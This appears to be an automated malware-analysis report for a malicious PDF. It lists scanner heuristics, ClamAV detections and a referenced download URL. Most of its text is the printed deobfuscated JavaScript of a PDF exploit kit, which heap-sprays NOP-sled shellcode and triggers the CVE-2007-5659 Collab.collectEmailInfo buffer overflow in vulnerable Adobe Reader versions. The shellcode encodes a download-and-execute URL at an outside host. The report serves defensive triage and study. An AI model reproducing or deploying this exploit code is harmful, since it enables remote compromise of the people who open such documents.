MALICIOUS
Risk Score: 350
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
Collab.collectEmailInfo — CVE-2007-5659 [critical] [CVE exact] [CVE_2007_5659]
PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
-
JavaScript action [low] [4 related findings] [PDF_JAVASCRIPT]
PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [high] [CVE likely] [PDF_JS_ADOBE_APSB08_13_PATCH_GATE]
PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
Matched line in script:
var XQvh7jkmGPD = new Array();var tt_C_N_o = 0;var K6RC54 = "";function eo_Jv1g(Q6_R__Htc4S_5, fG1Yr44_Va){var g_ng__l = fG1Yr44_Va.toString();var US05ee = "";for(var E__j42q_y = 0; E__j42q_y < g_ng__l.length; E__j42q_y++) {var O_BE__hD = parseInt(g_ng__l.substr(E__j42q_y, 1));if (!isNaN(O_BE__hD)) {O_BE__hD = O_BE__hD.toString(16);if (O_BE__hD.length == 1) { O_BE__hD = "0" + O_BE__hD; }else if (O_BE__hD.length != 2) { O_BE__hD = "00"; }US05ee = O_BE__hD + US05ee;}}while(US05ee.length < 8) { US0 … -
PDF JavaScript exploit cluster [critical] [PDF_JS_EXPLOIT_CLUSTER]
PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script:
z = y = app[h.replace(/[aviezjl]/g, '')]; var tmp = 'syncAEEotScan'; y = 0; z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l ) ;app[h.replace(/[czomdqs]/g, '')]( s); s = ''; z = 1; -
PDF exploit shellcode contains an embedded download URL [high] [PDF_JS_SHELLCODE_DOWNLOAD_URL]
Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream [low] [PDF_JS]
PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
ClamAV: Pdf.Exploit.Agent-35905 [critical] [CLAMAV_DETECTION]
ClamAV detected this file as malware: Pdf.Exploit.Agent-35905
-
Suspicious extracted artifact [info] [EXTRACTED_FILE_STATIC_TRIAGE]
One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL [info] [EMBEDDED_URL]
One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://beancountercity.in/cgi-bin/uiq/eH20c5b855V0100f060006R21502024102Tb9ed5e32203l0019 (referenced by PDF JavaScript)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0008_000.js | pdf-javascript-stream | PDF /JS object 8 at offset 0x238A | 231 bytes |

SHA-256: ebac9baa7de3a294531abfb5e17af88ac33bc92e7a9e5aa6e06af55d631ceb6f
Preview script: first 1,000 lines of the extracted script
| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1ED | 11901 bytes |

SHA-256: 21920a56a0884135976a27a2de9b01d41d7c9d89469af791c03e12164a5100c6

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
function p0r__D6hQuV_A(g_4cRLlo__JKhv, j1ow_b){var l_a_ac = arguments.callee;var K21_0mBxy_1 = 0;var BWQ3gATpi3D1E5 = 512;l_a_ac = l_a_ac.toString();try {if (app) {K21_0mBxy_1 = 3;K21_0mBxy_1--;}} catch(e) { }var Q8b__0N = new Array();if (g_4cRLlo__JKhv) { Q8b__0N = g_4cRLlo__JKhv;} else {var D__J_DbS4_cu = 0;var xF4_OqgeAg = 0;var cK___3q1t8_cfx = 49;cK___3q1t8_cfx--;while(xF4_OqgeAg < l_a_ac.length) {var p__35l8Q6_H = 1;var I_710unu = l_a_ac.charCodeAt(xF4_OqgeAg);if (I_710unu >= cK___3q1t8_cfx && I_710unu <= (cK___3q1t8_cfx + 9)) {if (D__J_DbS4_cu == 4) { D__J_DbS4_cu = 0; }if (isNaN(Q8b__0N[D__J_DbS4_cu])) { Q8b__0N[D__J_DbS4_cu] = 0; }Q8b__0N[D__J_DbS4_cu] += I_710unu;if (Q8b__0N[D__J_DbS4_cu] > BWQ3gATpi3D1E5) {Q8b__0N[D__J_DbS4_cu] -= BWQ3gATpi3D1E5;}D__J_DbS4_cu++;}xF4_OqgeAg++;}}D__J_DbS4_cu = 4;BWQ3gATpi3D1E5 = 256;while (D__J_DbS4_cu > 0) {var xF4_OqgeAg = D__J_DbS4_cu - 1;if (Q8b__0N[xF4_OqgeAg] > BWQ3gATpi3D1E5) {Q8b__0N[xF4_OqgeAg] -= BWQ3gATpi3D1E5;}D__J_DbS4_cu--;}var H_YR6T8go_g = 0;var X_u_1YIE_I___l = "";var W__ovb = 0;var Tn2O51 = 0;var rUVeh6E8_t = 0;var nC0_I_R8n00aFfU;var DY_60_f18 = 0;while(Tn2O51 < j1ow_b.length) {var bjm_q7246x7Iq = j1ow_b.substr(Tn2O51, 1) + "J";var qDb_L2Lcp = parseInt(bjm_q7246x7Iq, 16);if (rUVeh6E8_t) {nC0_I_R8n00aFfU += qDb_L2Lcp;if (H_YR6T8go_g == 4) {H_YR6T8go_g -= 4;}var xs_I_p0 = nC0_I_R8n00aFfU;xs_I_p0 = xs_I_p0 - (DY_60_f18 + 2) * Q8b__0N[H_YR6T8go_g];if (xs_I_p0 < 0) {var LcfJ_All = Math.floor(xs_I_p0 / 256);xs_I_p0 = xs_I_p0 - LcfJ_All * 256;}xs_I_p0 = String.fromCharCode(xs_I_p0);if (K21_0mBxy_1 == 1) {X_u_1YIE_I___l += qDb_L2Lcp;} else if (K21_0mBxy_1 == 2) {X_u_1YIE_I___l += xs_I_p0;} else {X_u_1YIE_I___l += Tn2O51;}H_YR6T8go_g++;DY_60_f18++;rUVeh6E8_t = 0;} else {nC0_I_R8n00aFfU = qDb_L2Lcp * 16;rUVeh6E8_t = 1;}Tn2O51++;}eval(X_u_1YIE_I___l);return 0;}
| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_001.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1ED | 5012 bytes |

SHA-256: cf96fb932fca9ca37c5b53712afeef6795fcc71ad3ac5176b833401729eb75b8

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script: first 1,000 lines of the extracted script
var XQvh7jkmGPD = new Array();var tt_C_N_o = 0;var K6RC54 = "";function eo_Jv1g(Q6_R__Htc4S_5, fG1Yr44_Va){var g_ng__l = fG1Yr44_Va.toString();var US05ee = "";for(var E__j42q_y = 0; E__j42q_y < g_ng__l.length; E__j42q_y++) {var O_BE__hD = parseInt(g_ng__l.substr(E__j42q_y, 1));if (!isNaN(O_BE__hD)) {O_BE__hD = O_BE__hD.toString(16);if (O_BE__hD.length == 1) { O_BE__hD = "0" + O_BE__hD; }else if (O_BE__hD.length != 2) { O_BE__hD = "00"; }US05ee = O_BE__hD + US05ee;}}while(US05ee.length < 8) { US05ee = "0" + US05ee; }var q17_2__Af4_J__d = Q6_R__Htc4S_5.toString(16);if (q17_2__Af4_J__d.length == 1) { q17_2__Af4_J__d = "0" + q17_2__Af4_J__d; }else if (q17_2__Af4_J__d.length != 2) { q17_2__Af4_J__d = "00"; }US05ee = "3" + q17_2__Af4_J__d + "P" + US05ee;return US05ee;}function TmAym_7_nWx(L4_bE8t___o, BO82Tt0n6Oa){var g78_GwP_5_f = new Array("");var WFv7G2t_B = L4_bE8t___o;var Bt_pEbnDx___7l;if ((Bt_pEbnDx___7l = L4_bE8t___o.lastIndexOf("%u00")) != -1) {if (Bt_pEbnDx___7l + 6 == L4_bE8t___o.length) {g78_GwP_5_f[0] = L4_bE8t___o.substr(Bt_pEbnDx___7l + 4, 2);WFv7G2t_B = L4_bE8t___o.substring(0, Bt_pEbnDx___7l);}}Bt_pEbnDx___7l = 1;for (E__j42q_y = 0; E__j42q_y < BO82Tt0n6Oa.length; E__j42q_y++) {var nbhM_An_2sp = BO82Tt0n6Oa.charCodeAt(E__j42q_y).toString(16);if (nbhM_An_2sp.length == 1) { nbhM_An_2sp = "0" + nbhM_An_2sp; }g78_GwP_5_f[Bt_pEbnDx___7l] = nbhM_An_2sp;Bt_pEbnDx___7l++;}E__j42q_y = g78_GwP_5_f[0].length ? 
0 : 1;g78_GwP_5_f[Bt_pEbnDx___7l] = "00";g78_GwP_5_f[Bt_pEbnDx___7l + 1] = "00";Bt_pEbnDx___7l += 2;if ((g78_GwP_5_f.length - E__j42q_y) % 2) {g78_GwP_5_f[Bt_pEbnDx___7l] = "00";}while(E__j42q_y < g78_GwP_5_f.length) {WFv7G2t_B += "%u" + g78_GwP_5_f[E__j42q_y + 1] + g78_GwP_5_f[E__j42q_y];E__j42q_y += 2;}WFv7G2t_B += "%u0000";return WFv7G2t_B;}function Ix_o8l(ig3W01UL_O2L, WmihXf7lKa31){while (ig3W01UL_O2L.length*2<WmihXf7lKa31) {ig3W01UL_O2L += ig3W01UL_O2L;}ig3W01UL_O2L = ig3W01UL_O2L.substring(0,WmihXf7lKa31/2);return ig3W01UL_O2L;}function H5Bg_7NTxH_f(ON07ASNjIh2A, TOK26M6, V_81dmV_b_BBm){var d_8_rb6 = 0x0c0c0c0c;var ig3W01UL_O2L = unescape(TOK26M6);var BO82Tt0n6Oa = eo_Jv1g(ON07ASNjIh2A, V_81dmV_b_BBm);var tw0sv475N__dY = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var L4_bE8t___o = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6670%u4750%u0063%u7468%u7074%u2f3a%u622f%u6165%u636e%u756f%u746e%u7265%u6963%u7974%u692e%u2f6e%u6763%u2d69%
u6962%u2f6e%u6975%u2f71%u4865%u3032%u3563%u3862%u3535%u3056%u3031%u6630%u3630%u3030%u3630%u3252%u3531%u3230%u3230%u3134%u3230%u6254%u6539%u3564%u3365%u3232%u3330%u306c%u3130%u0039";app.xUH_d6_x = unescape(TmAym_7_nWx(L4_bE8t___o, BO82Tt0n6Oa));var i5X_15H_FcD1_vn = 0x400000;var wo7WsdU_Rn_5D = tw0sv475N__dY.length * 2;var WmihXf7lKa31 = i5X_15H_FcD1_vn - (wo7WsdU_Rn_5D+0x38);ig3W01UL_O2L = Ix_o8l(ig3W01UL_O2L, WmihXf7lKa31);var n68_DGGl3I65 = (d_8_rb6 - 0x400000)/i5X_15H_FcD1_vn;for (var c__O6w = 0; c__O6w < n68_DGGl3I65; c__O6w++) {XQvh7jkmGPD[c__O6w] = ig3W01UL_O2L + tw0sv475N__dY;}}function Hw_D_W5_5N(){var osb_A_0 = "";for (E__j42q_y = 0; E__j42q_y < 12; E__j42q_y++) {osb_A_0 += unescape("%u0c0c%u0c0c");}var fhW_fd_W_hb3f = "";for (E__j42q_y = 0; E__j42q_y < 750; E__j42q_y++) {fhW_fd_W_hb3f += osb_A_0;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: fhW_fd_W_hb3f});app.clearTimeOut(tt_C_N_o);}function D7_PoO7k_1A_6(p_q708R){var Y4p8bS_7WI1q = tt_C_N_o;if ((p_q708R >= 8 && p_q708R < 8.11) || p_q708R < 7.1) {H5Bg_7NTxH_f(23, "%u0c0c%u0c0c", p_q708R);Hw_D_W5_5N();} if (Y4p8bS_7WI1q) {app.clearTimeOut(Y4p8bS_7WI1q);}}var V_81dmV_b_BBm = 0;var x0WKRH34GE = app.plugIns;for (var C_nkGGpS = 0; C_nkGGpS < x0WKRH34GE.length; C_nkGGpS++) {var w07PH_8J_2s = x0WKRH34GE[C_nkGGpS].version;if (w07PH_8J_2s > V_81dmV_b_BBm) { V_81dmV_b_BBm = w07PH_8J_2s; }}if (app.viewerVersion == 9.103 && V_81dmV_b_BBm < 9.13) {V_81dmV_b_BBm = 9.13;}app.PHFo5_4Em17y84A = D7_PoO7k_1A_6;tt_C_N_o = app.setTimeOut("app.PHFo5_4Em17y84A(" + V_81dmV_b_BBm.toString() + ")", 50);